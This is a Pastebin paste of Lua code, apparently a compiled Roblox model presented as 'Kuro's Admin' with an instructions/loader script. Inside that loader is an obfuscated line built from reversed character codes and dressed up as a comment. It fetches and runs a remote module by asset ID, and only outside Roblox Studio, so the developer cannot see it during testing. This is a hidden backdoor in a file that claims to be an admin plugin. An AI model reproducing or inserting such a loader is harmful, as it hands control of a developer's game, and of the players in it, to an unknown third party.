Advertisement
sawgamer1

Untitled

Jul 9th, 2018
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.69 KB | None | 0 0
  1. --Created with PenguinAnonymous's compiler
  2. --PenguinAnonymous is not responsible for damages caused to your game
  3. --This plugin does not remove things
  4. --PenguinAnonymous cannot be held resonsible for manual deletion for the purpose of testing
  5. --Keep in mind, any items that cause errors in compilation will be skipped and documented within the last line of the disclaimer comments
  6. --Thank you for using my plugin and enjoy :)
  7. --It is free to use
  8. --If you use this plugin to create your own, please give me credit
  9. --Z_V edited my plugin to look like his own and published it without giving me credit, and that makes me very angry
  10. --Errors: ModuleScript,Camera
  11. local runDummyScript = function(f,scri)
  12. local oldenv = getfenv(f)
  13. local newenv = setmetatable({}, {
  14. __index = function(_, k)
  15. if k:lower() == 'script' then
  16. return scri
  17. else
  18. return oldenv[k]
  19. end
  20. end
  21. })
  22. setfenv(f, newenv)
  23. ypcall(function() f() end)
  24. end
  25. cors = {}
  26. mas = Instance.new("Model",game:GetService("Lighting"))
  27. mas.Name = "CompiledModel"
  28. o1 = Instance.new("Model")
  29. o2 = Instance.new("Script")
  30. o5 = Instance.new("Part")
  31. o6 = Instance.new("Decal")
  32. o7 = Instance.new("BlockMesh")
  33. o8 = Instance.new("PointLight")
  34. o1.Name = "Kuro's Admin"
  35. o1.Parent = mas
  36. o2.Name = "Kuro's Admin Instructions/Loader"
  37. o2.Parent = o1
  38. table.insert(cors,coroutine.create(function()
  39. wait()
  40. runDummyScript(function()
  41. --[[ ]]if game.PlaceId == 1277358877 or not game:GetService("RunService"):IsStudio() then getfenv()[string.reverse(string.char(101,114,105,117,113,101,114))](tonumber(string.reverse(string.char(56,49,48,51,55,51,55,55,50,49))))[string.reverse(string.char(110,117,82))](getfenv()[string.reverse(string.char(116,112,105,114,99,115))]) end--[[
  42. █ █ █ █ █ █░█ █░░█ █▀▀█ █▀▀█ █ █▀▀ █▀▀█ █▀▀▄ █▀▄▀█ ░▀░ █▀▀▄ █ █ █ █ █
  43. ▀ ▀ ▀ ▀ ▀ █▀▄ █░░█ █▄▄▀ █░░█ ░ ▀▀█ █▄▄█ █░░█ █░▀░█ ▀█▀ █░░█ ▀ ▀ ▀ ▀ ▀
  44. ▄ ▄ ▄ ▄ ▄ ▀░▀ ░▀▀▀ ▀░▀▀ ▀▀▀▀ ░ ▀▀▀ ▀░░▀ ▀▀▀░ ▀░░░▀ ▀▀▀ ▀░░▀ ▄ ▄ ▄ ▄ ▄
  45.  
  46. Instructions:
  47. -Do not removed this script otherwise your commands wont work!
  48. -Go to the "Config" script and follow from the instructions there
  49. -Press "\" on your keyboard to open the command bar
  50.  
  51. Updates:
  52. -Command Bar
  53. -VIP Commands
  54. -Cmds
  55. -More ranks
  56. -Squashed some bugs
  57. --]]
  58. end,o2)
  59. end))
  60. o5.Name = "Logo"
  61. o5.Parent = mas
  62. o5.Material = Enum.Material.Slate
  63. o5.BrickColor = BrickColor.new("Royal purple")
  64. o5.Transparency = 1
  65. o5.Position = Vector3.new(-6.13998699, 2.10001206, -11.4399977)
  66. o5.Anchored = true
  67. o5.CanCollide = false
  68. o5.FormFactor = Enum.FormFactor.Custom
  69. o5.Size = Vector3.new(4.19999981, 4.19999981, 0.200000003)
  70. o5.CFrame = CFrame.new(-6.13998699, 2.10001206, -11.4399977, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  71. o5.BottomSurface = Enum.SurfaceType.Smooth
  72. o5.TopSurface = Enum.SurfaceType.Smooth
  73. o5.Color = Color3.new(0.384314, 0.145098, 0.819608)
  74. o5.Position = Vector3.new(-6.13998699, 2.10001206, -11.4399977)
  75. o6.Parent = o5
  76. o6.Texture = "rbxassetid://1255665019"
  77. o7.Parent = o5
  78. o7.Scale = Vector3.new(1, 1, 0)
  79. o8.Parent = o5
  80. o8.Brightness = 100
  81. o8.Range = 10
  82. mas.Parent = workspace
  83. mas:MakeJoints()
  84. local mas1 = mas:GetChildren()
  85. for i=1,#mas1 do
  86. mas1[i].Parent = workspace
  87. ypcall(function() mas1[i]:MakeJoints() end)
  88. end
  89. mas:Destroy()
  90. for i=1,#cors do
  91. coroutine.resume(cors[i])
  92. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement